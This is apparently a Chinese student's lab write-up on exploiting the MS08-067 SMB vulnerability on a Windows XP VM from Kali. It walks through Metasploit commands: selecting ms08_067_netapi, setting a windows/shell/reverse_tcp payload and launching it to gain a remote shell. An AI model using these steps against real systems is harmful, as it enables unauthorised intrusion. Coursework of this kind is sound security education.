MS08_067漏洞渗透攻击

MS08_067漏洞渗透攻击实践

• 前期准备
  kali和winxp要ping通
  

• kali开启msfconsole；
  

同时在这里可以看到目前可攻击载荷个数一共是471个，也可以看到其他攻击的数量如图。

• 用命令search ms08_067,查找渗透模块：
  

• 输入命令use exploit/windows/smb/ms08_067_netapi 后，就可以使用这个模块啦
  

• show target可以看到可攻击靶机的操作系统型号

  show payload可以看到有效的攻击载荷 为了和其他同学有所区分 我选择“windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP Stager”，使用反向TCP shell，这个有效载荷会执行cmd.exe并通过连接回传，达到“远程访问”的目的。攻击效果中等难度
  
  

• 使用命令set payload windows/shell/reverse_tcp设置有关参数，并查看

• 确认无误后，用exploit命令开始攻击，成功获取权限
  
  

• 可以在winxp C盘下新建一个带有学号20145201的文件夹，之后再kali中查看，该文件夹存在